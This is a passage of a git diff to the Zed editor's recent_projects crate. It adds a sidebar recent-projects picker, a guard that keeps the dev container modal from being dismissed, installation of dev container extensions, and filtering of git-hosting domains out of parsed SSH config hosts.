Some(ProjectPickerEntry::OpenFolder { .. })) + { + "Remove Folder" + } else { + "Remove from Window" + }; + Some( + Button::new("remove_selected", label) + .key_binding(KeyBinding::for_action_in( + &RemoveSelected, + &focus_handle, + cx, + )) + .on_click(|_, window, cx| { + window.dispatch_action(RemoveSelected.boxed_clone(), cx) + }) + .into_any_element(), + ) + } + Some(ProjectPickerEntry::RecentProject(_)) => Some( + Button::new("delete_recent", "Delete") + .key_binding(KeyBinding::for_action_in( + &RemoveSelected, + &focus_handle, + cx, + )) + .on_click(|_, window, cx| { + window.dispatch_action(RemoveSelected.boxed_clone(), cx) + }) + .into_any_element(), + ), + _ => None, + }; + Some( h_flex() .flex_1() @@ -1301,8 +1669,11 @@ impl PickerDelegate for RecentProjectsDelegate { .justify_end() .border_t_1() .border_color(cx.theme().colors().border_variant) + .when_some(secondary_footer_actions, |this, actions| { + this.child(actions) + }) .map(|this| { - if open_folder_section { + if is_already_open_entry { this.child( Button::new("activate", "Activate") .key_binding(KeyBinding::for_action_in( @@ -1349,7 +1720,7 @@ impl PickerDelegate for RecentProjectsDelegate { y: px(-2.0), }) .trigger( - Button::new("actions-trigger", "Actions…") + Button::new("actions-trigger", "Actions") .selected_style(ButtonStyle::Tinted(TintColor::Accent)) .key_binding(KeyBinding::for_action_in( &ToggleActionsMenu, @@ -1359,15 +1730,32 @@ impl PickerDelegate for RecentProjectsDelegate { ) .menu({ let focus_handle = focus_handle.clone(); + let show_add_to_workspace = match selected_entry { + Some(ProjectPickerEntry::RecentProject(hit)) => self + .workspaces + .get(hit.candidate_id) + .map(|(_, loc, ..)| { + matches!(loc, SerializedWorkspaceLocation::Local) + }) + .unwrap_or(false), + _ => false, + }; move |window, cx| { Some(ContextMenu::build(window, cx, { let focus_handle = focus_handle.clone(); move |menu, _, _| { menu.context(focus_handle) + .when(show_add_to_workspace, |menu| { + menu.action( + "Add to Workspace", + AddToWorkspace.boxed_clone(), + ) + .separator() + }) .action( "Open Local Project", - workspace::Open.boxed_clone(), + workspace::Open::default().boxed_clone(), ) .action( "Open Remote Project", @@ -1387,7 +1775,7 @@ impl PickerDelegate for RecentProjectsDelegate { } } -fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName { +pub(crate) fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName { match options { None => IconName::Screen, Some(options) => match options { @@ -1401,7 +1789,7 @@ fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> Icon } // Compute the highlighted text for the name and path -fn highlights_for_path( +pub(crate) fn highlights_for_path( path: &Path, match_positions: &Vec, path_start_offset: usize, @@ -1500,16 +1888,16 @@ impl RecentProjectsDelegate { .workspace .upgrade() .map(|ws| ws.read(cx).app_state().fs.clone()); + let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this, cx| { - WORKSPACE_DB - .delete_workspace_by_id(workspace_id) - .await - .log_err(); + db.delete_workspace_by_id(workspace_id).await.log_err(); let Some(fs) = fs else { return }; - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .unwrap_or_default(); + let workspaces = + workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |picker, window, cx| { picker.delegate.set_workspaces(workspaces); picker @@ -1530,6 +1918,31 @@ impl RecentProjectsDelegate { } } + fn remove_sibling_workspace( + &mut self, + workspace_id: WorkspaceId, + window: &mut Window, + cx: &mut Context>, + ) { + if let Some(handle) = window.window_handle().downcast::() { + cx.defer(move |cx| { + handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace + .workspaces() + .find(|ws| ws.read(cx).database_id() == Some(workspace_id)) + .cloned(); + if let Some(workspace) = workspace { + multi_workspace.remove(&workspace, window, cx); + } + }) + .log_err(); + }); + } + + self.sibling_workspace_ids.remove(&workspace_id); + } + fn is_current_workspace( &self, workspace_id: WorkspaceId, @@ -1545,6 +1958,15 @@ impl RecentProjectsDelegate { false } + fn is_sibling_workspace( + &self, + workspace_id: WorkspaceId, + cx: &mut Context>, + ) -> bool { + self.sibling_workspace_ids.contains(&workspace_id) + && !self.is_current_workspace(workspace_id, cx) + } + fn is_open_folder(&self, paths: &PathList) -> bool { if self.open_folders.is_empty() { return false; @@ -1567,7 +1989,9 @@ impl RecentProjectsDelegate { paths: &PathList, cx: &mut Context>, ) -> bool { - !self.is_current_workspace(workspace_id, cx) && !self.is_open_folder(paths) + !self.is_current_workspace(workspace_id, cx) + && !self.is_sibling_workspace(workspace_id, cx) + && !self.is_open_folder(paths) } } @@ -1576,7 +2000,7 @@ mod tests { use std::path::PathBuf; use editor::Editor; - use gpui::{TestAppContext, UpdateGlobal, WindowHandle}; + use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, WindowHandle}; use serde_json::json; use settings::SettingsStore; @@ -1586,7 +2010,7 @@ mod tests { use super::*; #[gpui::test] - async fn test_dirty_workspace_survives_when_opening_recent_project(cx: &mut TestAppContext) { + async fn test_dirty_workspace_replaced_when_opening_recent_project(cx: &mut TestAppContext) { let app_state = init_test(cx); cx.update(|cx| { @@ -1628,6 +2052,11 @@ mod tests { assert_eq!(cx.update(|cx| cx.windows().len()), 1); let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + multi_workspace + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); multi_workspace .update(cx, |multi_workspace, _, cx| { assert!(!multi_workspace.workspace().read(cx).is_edited()) @@ -1695,6 +2124,13 @@ mod tests { cx.dispatch_action(*multi_workspace, menu::Confirm); cx.run_until_parked(); + // In multi-workspace mode, the dirty workspace is kept and a new one is + // opened alongside it — no save prompt needed. + assert!( + !cx.has_pending_prompt(), + "Should not prompt in multi-workspace mode — dirty workspace is kept" + ); + multi_workspace .update(cx, |multi_workspace, _, cx| { assert!( @@ -1707,26 +2143,16 @@ mod tests { ); assert!( - multi_workspace.workspaces().len() >= 2, - "Should have at least 2 workspaces: the dirty one and the newly opened one" - ); - - assert!( - multi_workspace.workspaces().contains(&dirty_workspace), - "The original dirty workspace should still be present" + multi_workspace.workspaces().any(|w| w == &dirty_workspace), + "The dirty workspace should still be present in multi-workspace mode" ); assert!( - dirty_workspace.read(cx).is_edited(), - "The original workspace should still be dirty" + !multi_workspace.workspace().read(cx).is_edited(), + "The active workspace should be the freshly opened one, not dirty" ); }) .unwrap(); - - assert!( - !cx.has_pending_prompt(), - "No save prompt in multi-workspace mode — dirty workspace survives in background" - ); } fn open_recent_projects( @@ -1773,9 +2199,16 @@ mod tests { ) .await; + // Open a file path (not a directory) so that the worktree root is a + // file. This means `active_project_directory` returns `None`, which + // causes `DevContainerContext::from_workspace` to return `None`, + // preventing `open_dev_container` from spawning real I/O (docker + // commands, shell environment loading) that is incompatible with the + // test scheduler. The modal is still created and the re-entrancy + // guard that this test validates is still exercised. cx.update(|cx| { open_paths( - &[PathBuf::from(path!("/project"))], + &[PathBuf::from(path!("/project/src/main.rs"))], app_state, workspace::OpenOptions::default(), cx, @@ -1811,6 +2244,71 @@ mod tests { .unwrap(); } + #[gpui::test] + async fn test_dev_container_modal_not_dismissed_on_backdrop_click(cx: &mut TestAppContext) { + let app_state = init_test(cx); + + app_state + .fs + .as_fake() + .insert_tree( + path!("/project"), + json!({ + ".devcontainer": { + "devcontainer.json": "{}" + }, + "src": { + "main.rs": "fn main() {}" + } + }), + ) + .await; + + cx.update(|cx| { + open_paths( + &[PathBuf::from(path!("/project"))], + app_state, + workspace::OpenOptions::default(), + cx, + ) + }) + .await + .unwrap(); + + assert_eq!(cx.update(|cx| cx.windows().len()), 1); + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + + cx.run_until_parked(); + + cx.dispatch_action(*multi_workspace, OpenDevContainer); + + multi_workspace + .update(cx, |multi_workspace, _, cx| { + assert!( + multi_workspace + .active_modal::(cx) + .is_some(), + "Dev container modal should be open" + ); + }) + .unwrap(); + + // Click outside the modal (on the backdrop) to try to dismiss it + let mut vcx = VisualTestContext::from_window(*multi_workspace, cx); + vcx.simulate_click(gpui::point(px(1.0), px(1.0)), gpui::Modifiers::default()); + + multi_workspace + .update(cx, |multi_workspace, _, cx| { + assert!( + multi_workspace + .active_modal::(cx) + .is_some(), + "Dev container modal should remain open during creation" + ); + }) + .unwrap(); + } + #[gpui::test] async fn test_open_dev_container_action_with_multiple_configs(cx: &mut TestAppContext) { let app_state = init_test(cx); diff --git a/crates/recent_projects/src/remote_connections.rs b/crates/recent_projects/src/remote_connections.rs index b5af1a110a5b0ebae6cb8e6e035791b564e15527..869568edfcdbe9260a13aaa5c0ed7eed6b87e675 100644 --- a/crates/recent_projects/src/remote_connections.rs +++ b/crates/recent_projects/src/remote_connections.rs @@ -10,7 +10,6 @@ use extension_host::ExtensionStore; use futures::{FutureExt as _, channel::oneshot, select}; use gpui::{AppContext, AsyncApp, PromptLevel, WindowHandle}; -use language::Point; use project::trusted_worktrees; use remote::{ DockerConnectionOptions, Interactive, RemoteConnection, RemoteConnectionOptions, @@ -97,6 +96,7 @@ impl From for RemoteConnectionOptions { container_id: conn.container_id, upload_binary_over_docker_exec: false, use_podman: conn.use_podman, + remote_env: conn.remote_env, }) } } @@ -133,7 +133,7 @@ pub async fn open_remote_project( open_options: workspace::OpenOptions, cx: &mut AsyncApp, ) -> Result<()> { - let created_new_window = open_options.replace_window.is_none(); + let created_new_window = open_options.requesting_window.is_none(); let (existing, open_visible) = find_existing_workspace( &paths, @@ -160,7 +160,7 @@ pub async fn open_remote_project( let open_results = existing_window .update(cx, |multi_workspace, window, cx| { window.activate_window(); - multi_workspace.activate(existing_workspace.clone(), cx); + multi_workspace.activate(existing_workspace.clone(), window, cx); existing_workspace.update(cx, |workspace, cx| { workspace.open_paths( resolved_paths, @@ -202,7 +202,7 @@ pub async fn open_remote_project( ); } - let (window, initial_workspace) = if let Some(window) = open_options.replace_window { + let (window, initial_workspace) = if let Some(window) = open_options.requesting_window { let workspace = window.update(cx, |multi_workspace, _, _| { multi_workspace.workspace().clone() })?; @@ -458,7 +458,12 @@ pub fn navigate_to_positions( active_editor.update(cx, |editor, cx| { let row = row.saturating_sub(1); let col = path.column.unwrap_or(0).saturating_sub(1); - editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx); + let Some(buffer) = editor.buffer().read(cx).as_singleton() else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let point = buffer_snapshot.point_from_external_input(row, col); + editor.go_to_singleton_buffer_point(point, window, cx); }); }) .ok(); @@ -850,7 +855,7 @@ mod tests { paths, app_state, workspace::OpenOptions { - replace_window: Some(window), + requesting_window: Some(window), ..Default::default() }, &mut async_cx, diff --git a/crates/recent_projects/src/remote_servers.rs b/crates/recent_projects/src/remote_servers.rs index 8bddcf37270e56932e75635fcd35616d12309b6e..7db09c88616879010352cbc2ac0fd0549982240b 100644 --- a/crates/recent_projects/src/remote_servers.rs +++ b/crates/recent_projects/src/remote_servers.rs @@ -11,13 +11,13 @@ use dev_container::{ }; use editor::Editor; +use extension_host::ExtensionStore; use futures::{FutureExt, channel::oneshot, future::Shared}; use gpui::{ Action, AnyElement, App, ClickEvent, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, WeakEntity, Window, canvas, }; -use language::Point; use log::{debug, info}; use open_path_prompt::OpenPathDelegate; use paths::{global_ssh_config_file, user_ssh_config_file}; @@ -42,6 +42,7 @@ use std::{ atomic::{self, AtomicUsize}, }, }; + use ui::{ CommonAnimationExt, IconButtonShape, KeyBinding, List, ListItem, ListSeparator, Modal, ModalFooter, ModalHeader, Navigable, NavigableEntry, Section, Tooltip, WithScrollbar, @@ -53,7 +54,7 @@ use util::{ rel_path::RelPath, }; use workspace::{ - AppState, ModalView, MultiWorkspace, OpenLog, OpenOptions, Toast, Workspace, + AppState, DismissDecision, ModalView, MultiWorkspace, OpenLog, OpenOptions, Toast, Workspace, notifications::{DetachAndPromptErr, NotificationId}, open_remote_project_with_existing_connection, }; @@ -68,6 +69,7 @@ pub struct RemoteServerProjects { create_new_window: bool, dev_container_picker: Option>>, _subscription: Subscription, + allow_dismissal: bool, } struct CreateRemoteServer { @@ -390,7 +392,7 @@ impl ProjectPicker { ) -> Entity { let (tx, rx) = oneshot::channel(); let lister = project::DirectoryLister::Project(project.clone()); - let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx); + let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx).show_hidden(); let picker = cx.new(|cx| { let picker = Picker::uniform_list(delegate, window, cx) @@ -519,11 +521,15 @@ impl ProjectPicker { active_editor.update(cx, |editor, cx| { let row = row.saturating_sub(1); let col = path.column.unwrap_or(0).saturating_sub(1); - editor.go_to_singleton_buffer_point( - Point::new(row, col), - window, - cx, - ); + let Some(buffer) = + editor.buffer().read(cx).as_singleton() + else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let point = + buffer_snapshot.point_from_external_input(row, col); + editor.go_to_singleton_buffer_point(point, window, cx); }); }) .ok(); @@ -915,6 +921,7 @@ impl RemoteServerProjects { create_new_window, dev_container_picker: None, _subscription, + allow_dismissal: true, } } @@ -1135,6 +1142,7 @@ impl RemoteServerProjects { } fn view_in_progress_dev_container(&mut self, window: &mut Window, cx: &mut Context) { + self.allow_dismissal = false; self.mode = Mode::CreateRemoteDevContainer(CreateRemoteDevContainer::new( DevContainerCreationProgress::Creating, cx, @@ -1161,12 +1169,11 @@ impl RemoteServerProjects { workspace.toggle_modal(window, cx, |window, cx| { RemoteConnectionModal::new(&connection_options, Vec::new(), window, cx) }); - let prompt = workspace - .active_modal::(cx) - .unwrap() - .read(cx) - .prompt - .clone(); + // can be None if another copy of this modal opened in the meantime + let Some(modal) = workspace.active_modal::(cx) else { + return; + }; + let prompt = modal.read(cx).prompt.clone(); let connect = connect( ConnectionIdentifier::setup(), @@ -1305,6 +1312,7 @@ impl RemoteServerProjects { cx.emit(DismissEvent); } _ => { + self.allow_dismissal = true; self.mode = Mode::default_mode(&self.ssh_config_servers, cx); self.focus_handle(cx).focus(window, cx); cx.notify(); @@ -1564,7 +1572,7 @@ impl RemoteServerProjects { project.paths.into_iter().map(PathBuf::from).collect(), app_state, OpenOptions { - replace_window, + requesting_window: replace_window, ..OpenOptions::default() }, cx, @@ -1619,23 +1627,24 @@ impl RemoteServerProjects { })) .tooltip(Tooltip::text(project.paths.join("\n"))) .when(is_from_zed, |server_list_item| { - server_list_item.end_hover_slot::(Some( - div() - .mr_2() - .child({ - let project = project.clone(); - // Right-margin to offset it from the Scrollbar - IconButton::new("remove-remote-project", IconName::Trash) - .icon_size(IconSize::Small) - .shape(IconButtonShape::Square) - .size(ButtonSize::Large) - .tooltip(Tooltip::text("Delete Remote Project")) - .on_click(cx.listener(move |this, _, _, cx| { - this.delete_remote_project(server_ix, &project, cx) - })) - }) - .into_any_element(), - )) + server_list_item + .end_slot( + div() + .mr_2() + .child({ + let project = project.clone(); + IconButton::new("remove-remote-project", IconName::Trash) + .icon_size(IconSize::Small) + .shape(IconButtonShape::Square) + .size(ButtonSize::Large) + .tooltip(Tooltip::text("Delete Remote Project")) + .on_click(cx.listener(move |this, _, _, cx| { + this.delete_remote_project(server_ix, &project, cx) + })) + }) + .into_any_element(), + ) + .show_end_slot_on_hover() }), ) } @@ -1657,7 +1666,9 @@ impl RemoteServerProjects { fn delete_ssh_server(&mut self, server: SshServerIndex, cx: &mut Context) { self.update_settings_file(cx, move |setting, _| { - if let Some(connections) = setting.ssh_connections.as_mut() { + if let Some(connections) = setting.ssh_connections.as_mut() + && connections.get(server.0).is_some() + { connections.remove(server.0); } }); @@ -1848,11 +1859,14 @@ impl RemoteServerProjects { cx: &mut Context, ) { let replace_window = window.window_handle().downcast::(); + let app_state = Arc::downgrade(&app_state); cx.spawn_in(window, async move |entity, cx| { - let (connection, starting_dir) = - match start_dev_container_with_config(context, config).await { - Ok((c, s)) => (Connection::DevContainer(c), s), + let environment = context.environment(cx).await; + + let (dev_container_connection, starting_dir) = + match start_dev_container_with_config(context, config, environment).await { + Ok((c, s)) => (c, s), Err(e) => { log::error!("Failed to start dev container: {:?}", e); cx.prompt( @@ -1865,6 +1879,7 @@ impl RemoteServerProjects { .ok(); entity .update_in(cx, |remote_server_projects, window, cx| { + remote_server_projects.allow_dismissal = true; remote_server_projects.mode = Mode::CreateRemoteDevContainer(CreateRemoteDevContainer::new( DevContainerCreationProgress::Error(format!("{e}")), @@ -1876,18 +1891,32 @@ impl RemoteServerProjects { return; } }; + cx.update(|_, cx| { + ExtensionStore::global(cx).update(cx, |this, cx| { + for extension in &dev_container_connection.extension_ids { + log::info!("Installing extension {extension} from devcontainer"); + this.install_latest_extension(Arc::from(extension.clone()), cx); + } + }) + }) + .log_err(); + entity - .update(cx, |_, cx| { + .update(cx, |this, cx| { + this.allow_dismissal = true; cx.emit(DismissEvent); }) .log_err(); + let Some(app_state) = app_state.upgrade() else { + return; + }; let result = open_remote_project( - connection.into(), + Connection::DevContainer(dev_container_connection).into(), vec![starting_dir].into_iter().map(PathBuf::from).collect(), app_state, OpenOptions { - replace_window, + requesting_window: replace_window, ..OpenOptions::default() }, cx, @@ -2112,8 +2141,10 @@ impl RemoteServerProjects { .child( Button::new("learn-more", "Learn More") .label_size(LabelSize::Small) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall), + ) .on_click(|_, _, cx| { cx.open_url( "https://zed.dev/docs/remote-development", @@ -2404,9 +2435,8 @@ impl RemoteServerProjects { .spacing(ui::ListItemSpacing::Sparse) .start_slot(Icon::new(IconName::Copy).color(Color::Muted)) .child(Label::new("Copy Server Address")) - .end_hover_slot( - Label::new(connection_string.clone()).color(Color::Muted), - ) + .end_slot(Label::new(connection_string.clone()).color(Color::Muted)) + .show_end_slot_on_hover() .on_click({ let connection_string = connection_string.clone(); move |_, _, cx| { @@ -2924,7 +2954,15 @@ fn get_text(element: &Entity, cx: &mut App) -> String { element.read(cx).text(cx).trim().to_string() } -impl ModalView for RemoteServerProjects {} +impl ModalView for RemoteServerProjects { + fn on_before_dismiss( + &mut self, + _window: &mut Window, + _cx: &mut Context, + ) -> DismissDecision { + DismissDecision::Dismiss(self.allow_dismissal) + } +} impl Focusable for RemoteServerProjects { fn focus_handle(&self, cx: &App) -> FocusHandle { diff --git a/crates/recent_projects/src/sidebar_recent_projects.rs b/crates/recent_projects/src/sidebar_recent_projects.rs new file mode 100644 index 0000000000000000000000000000000000000000..1fe0d2ae86aefdad45136c496f8049689d77e048 --- /dev/null +++ b/crates/recent_projects/src/sidebar_recent_projects.rs @@ -0,0 +1,449 @@ +use std::collections::HashSet; +use std::sync::Arc; + +use chrono::{DateTime, Utc}; +use fuzzy::{StringMatch, StringMatchCandidate}; +use gpui::{ + Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, + Subscription, Task, WeakEntity, Window, +}; +use picker::{ + Picker, PickerDelegate, + highlighted_match_with_paths::{HighlightedMatch, HighlightedMatchWithPaths}, +}; +use remote::RemoteConnectionOptions; +use settings::Settings; +use ui::{KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*}; +use ui_input::ErasedEditor; +use util::{ResultExt, paths::PathExt}; +use workspace::{ + MultiWorkspace, OpenMode, OpenOptions, PathList, SerializedWorkspaceLocation, Workspace, + WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, +}; + +use zed_actions::OpenRemote; + +use crate::{highlights_for_path, icon_for_remote_connection, open_remote_project}; + +pub struct SidebarRecentProjects { + pub picker: Entity>, + _subscription: Subscription, +} + +impl SidebarRecentProjects { + pub fn popover( + workspace: WeakEntity, + sibling_workspace_ids: HashSet, + _focus_handle: FocusHandle, + window: &mut Window, + cx: &mut App, + ) -> Entity { + let fs = workspace + .upgrade() + .map(|ws| ws.read(cx).app_state().fs.clone()); + + cx.new(|cx| { + let delegate = SidebarRecentProjectsDelegate { + workspace, + sibling_workspace_ids, + workspaces: Vec::new(), + filtered_workspaces: Vec::new(), + selected_index: 0, + has_any_non_local_projects: false, + focus_handle: cx.focus_handle(), + }; + + let picker: Entity> = cx.new(|cx| { + Picker::list(delegate, window, cx) + .list_measure_all() + .show_scrollbar(true) + }); + + let picker_focus_handle = picker.focus_handle(cx); + picker.update(cx, |picker, _| { + picker.delegate.focus_handle = picker_focus_handle; + }); + + let _subscription = + cx.subscribe(&picker, |_this: &mut Self, _, _, cx| cx.emit(DismissEvent)); + + let db = WorkspaceDb::global(cx); + cx.spawn_in(window, async move |this, cx| { + let Some(fs) = fs else { return }; + let workspaces = db + .recent_workspaces_on_disk(fs.as_ref()) + .await + .log_err() + .unwrap_or_default(); + let workspaces = + workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + this.update_in(cx, move |this, window, cx| { + this.picker.update(cx, move |picker, cx| { + picker.delegate.set_workspaces(workspaces); + picker.update_matches(picker.query(cx), window, cx) + }) + }) + .ok(); + }) + .detach(); + + picker.focus_handle(cx).focus(window, cx); + + Self { + picker, + _subscription, + } + }) + } +} + +impl EventEmitter for SidebarRecentProjects {} + +impl Focusable for SidebarRecentProjects { + fn focus_handle(&self, cx: &App) -> FocusHandle { + self.picker.focus_handle(cx) + } +} + +impl Render for SidebarRecentProjects { + fn render(&mut self, _: &mut Window, _cx: &mut Context) -> impl IntoElement { + v_flex() + .key_context("SidebarRecentProjects") + .w(rems(18.)) + .child(self.picker.clone()) + } +} + +pub struct SidebarRecentProjectsDelegate { + workspace: WeakEntity, + sibling_workspace_ids: HashSet, + workspaces: Vec<( + WorkspaceId, + SerializedWorkspaceLocation, + PathList, + DateTime, + )>, + filtered_workspaces: Vec, + selected_index: usize, + has_any_non_local_projects: bool, + focus_handle: FocusHandle, +} + +impl SidebarRecentProjectsDelegate { + pub fn set_workspaces( + &mut self, + workspaces: Vec<( + WorkspaceId, + SerializedWorkspaceLocation, + PathList, + DateTime, + )>, + ) { + self.has_any_non_local_projects = workspaces + .iter() + .any(|(_, location, _, _)| !matches!(location, SerializedWorkspaceLocation::Local)); + self.workspaces = workspaces; + } +} + +impl EventEmitter for SidebarRecentProjectsDelegate {} + +impl PickerDelegate for SidebarRecentProjectsDelegate { + type ListItem = AnyElement; + + fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { + "Search recent projects…".into() + } + + fn render_editor( + &self, + editor: &Arc, + window: &mut Window, + cx: &mut Context>, + ) -> Div { + h_flex() + .flex_none() + .h_9() + .px_2p5() + .justify_between() + .border_b_1() + .border_color(cx.theme().colors().border_variant) + .child(editor.render(window, cx)) + } + + fn match_count(&self) -> usize { + self.filtered_workspaces.len() + } + + fn selected_index(&self) -> usize { + self.selected_index + } + + fn set_selected_index( + &mut self, + ix: usize, + _window: &mut Window, + _cx: &mut Context>, + ) { + self.selected_index = ix; + } + + fn update_matches( + &mut self, + query: String, + _: &mut Window, + cx: &mut Context>, + ) -> Task<()> { + let query = query.trim_start(); + let smart_case = query.chars().any(|c| c.is_uppercase()); + let is_empty_query = query.is_empty(); + + let current_workspace_id = self + .workspace + .upgrade() + .and_then(|ws| ws.read(cx).database_id()); + + let candidates: Vec<_> = self + .workspaces + .iter() + .enumerate() + .filter(|(_, (id, _, _, _))| { + Some(*id) != current_workspace_id && !self.sibling_workspace_ids.contains(id) + }) + .map(|(id, (_, _, paths, _))| { + let combined_string = paths + .ordered_paths() + .map(|path| path.compact().to_string_lossy().into_owned()) + .collect::>() + .join(""); + StringMatchCandidate::new(id, &combined_string) + }) + .collect(); + + if is_empty_query { + self.filtered_workspaces = candidates + .into_iter() + .map(|candidate| StringMatch { + candidate_id: candidate.id, + score: 0.0, + positions: Vec::new(), + string: candidate.string, + }) + .collect(); + } else { + let mut matches = smol::block_on(fuzzy::match_strings( + &candidates, + query, + smart_case, + true, + 100, + &Default::default(), + cx.background_executor().clone(), + )); + matches.sort_unstable_by(|a, b| { + b.score + .partial_cmp(&a.score) + .unwrap_or(std::cmp::Ordering::Equal) + .then_with(|| a.candidate_id.cmp(&b.candidate_id)) + }); + self.filtered_workspaces = matches; + } + + self.selected_index = 0; + Task::ready(()) + } + + fn confirm(&mut self, _secondary: bool, window: &mut Window, cx: &mut Context>) { + let Some(hit) = self.filtered_workspaces.get(self.selected_index) else { + return; + }; + let Some((_, location, candidate_workspace_paths, _)) = + self.workspaces.get(hit.candidate_id) + else { + return; + }; + + let Some(workspace) = self.workspace.upgrade() else { + return; + }; + + match location { + SerializedWorkspaceLocation::Local => { + if let Some(handle) = window.window_handle().downcast::() { + let paths = candidate_workspace_paths.paths().to_vec(); + cx.defer(move |cx| { + if let Some(task) = handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.open_project(paths, OpenMode::Activate, window, cx) + }) + .log_err() + { + task.detach_and_log_err(cx); + } + }); + } + } + SerializedWorkspaceLocation::Remote(connection) => { + let mut connection = connection.clone(); + workspace.update(cx, |workspace, cx| { + let app_state = workspace.app_state().clone(); + let replace_window = window.window_handle().downcast::(); + let open_options = OpenOptions { + requesting_window: replace_window, + ..Default::default() + }; + if let RemoteConnectionOptions::Ssh(connection) = &mut connection { + crate::RemoteSettings::get_global(cx) + .fill_connection_options_from_settings(connection); + }; + let paths = candidate_workspace_paths.paths().to_vec(); + cx.spawn_in(window, async move |_, cx| { + open_remote_project(connection.clone(), paths, app_state, open_options, cx) + .await + }) + .detach_and_prompt_err( + "Failed to open project", + window, + cx, + |_, _, _| None, + ); + }); + } + } + cx.emit(DismissEvent); + } + + fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context>) {} + + fn no_matches_text(&self, _window: &mut Window, _cx: &mut App) -> Option { + let text = if self.workspaces.is_empty() { + "Recently opened projects will show up here" + } else { + "No matches" + }; + Some(text.into()) + } + + fn render_match( + &self, + ix: usize, + selected: bool, + window: &mut Window, + cx: &mut Context>, + ) -> Option { + let hit = self.filtered_workspaces.get(ix)?; + let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + + let ordered_paths: Vec<_> = paths + .ordered_paths() + .map(|p| p.compact().to_string_lossy().to_string()) + .collect(); + + let tooltip_path: SharedString = match &location { + SerializedWorkspaceLocation::Remote(options) => { + let host = options.display_name(); + if ordered_paths.len() == 1 { + format!("{} ({})", ordered_paths[0], host).into() + } else { + format!("{}\n({})", ordered_paths.join("\n"), host).into() + } + } + _ => ordered_paths.join("\n").into(), + }; + + let mut path_start_offset = 0; + let match_labels: Vec<_> = paths + .ordered_paths() + .map(|p| p.compact()) + .map(|path| { + let (label, path_match) = + highlights_for_path(path.as_ref(), &hit.positions, path_start_offset); + path_start_offset += path_match.text.len(); + label + }) + .collect(); + + let prefix = match &location { + SerializedWorkspaceLocation::Remote(options) => { + Some(SharedString::from(options.display_name())) + } + _ => None, + }; + + let highlighted_match = HighlightedMatchWithPaths { + prefix, + match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "), + paths: Vec::new(), + }; + + let icon = icon_for_remote_connection(match location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(options) => Some(options), + }); + + Some( + ListItem::new(ix) + .toggle_state(selected) + .inset(true) + .spacing(ListItemSpacing::Sparse) + .child( + h_flex() + .gap_3() + .flex_grow() + .when(self.has_any_non_local_projects, |this| { + this.child(Icon::new(icon).color(Color::Muted)) + }) + .child(highlighted_match.render(window, cx)), + ) + .tooltip(Tooltip::text(tooltip_path)) + .into_any_element(), + ) + } + + fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { + let focus_handle = self.focus_handle.clone(); + + Some( + v_flex() + .p_1p5() + .flex_1() + .gap_1() + .border_t_1() + .border_color(cx.theme().colors().border_variant) + .child({ + let open_action = workspace::Open { + create_new_window: false, + }; + + Button::new("open_local_folder", "Add Local Project") + .key_binding(KeyBinding::for_action_in(&open_action, &focus_handle, cx)) + .on_click(cx.listener(move |_, _, window, cx| { + window.dispatch_action(open_action.boxed_clone(), cx); + cx.emit(DismissEvent); + })) + }) + .child( + Button::new("open_remote_folder", "Add Remote Project") + .key_binding(KeyBinding::for_action( + &OpenRemote { + from_existing_connection: false, + create_new_window: false, + }, + cx, + )) + .on_click(cx.listener(|_, _, window, cx| { + window.dispatch_action( + OpenRemote { + from_existing_connection: false, + create_new_window: false, + } + .boxed_clone(), + cx, + ); + cx.emit(DismissEvent); + })), + ) + .into_any(), + ) + } +} diff --git a/crates/recent_projects/src/ssh_config.rs b/crates/recent_projects/src/ssh_config.rs index f38181820553e2b2ae46f68761c7aea17caccd5d..6641c2df14d572d85591ed705f17f377682d58ee 100644 --- a/crates/recent_projects/src/ssh_config.rs +++ b/crates/recent_projects/src/ssh_config.rs @@ -1,60 +1,116 @@ use std::collections::BTreeSet; +const FILTERED_GIT_PROVIDER_HOSTNAMES: &[&str] = &[ + "dev.azure.com", + "bitbucket.org", + "chromium.googlesource.com", + "codeberg.org", + "gitea.com", + "gitee.com", + "github.com", + "gist.github.com", + "gitlab.com", + "sourcehut.org", + "git.sr.ht", +]; + pub fn parse_ssh_config_hosts(config: &str) -> BTreeSet { - let mut hosts = BTreeSet::new(); - let mut needs_another_line = false; + parse_host_blocks(config) + .into_iter() + .flat_map(HostBlock::non_git_provider_hosts) + .collect() +} + +struct HostBlock { + aliases: BTreeSet, + hostname: Option, +} + +impl HostBlock { + fn non_git_provider_hosts(self) -> impl Iterator { + let hostname = self.hostname; + let hostname_ref = hostname.as_deref().map(is_git_provider_domain); + self.aliases + .into_iter() + .filter(move |alias| !hostname_ref.unwrap_or_else(|| is_git_provider_domain(alias))) + } +} + 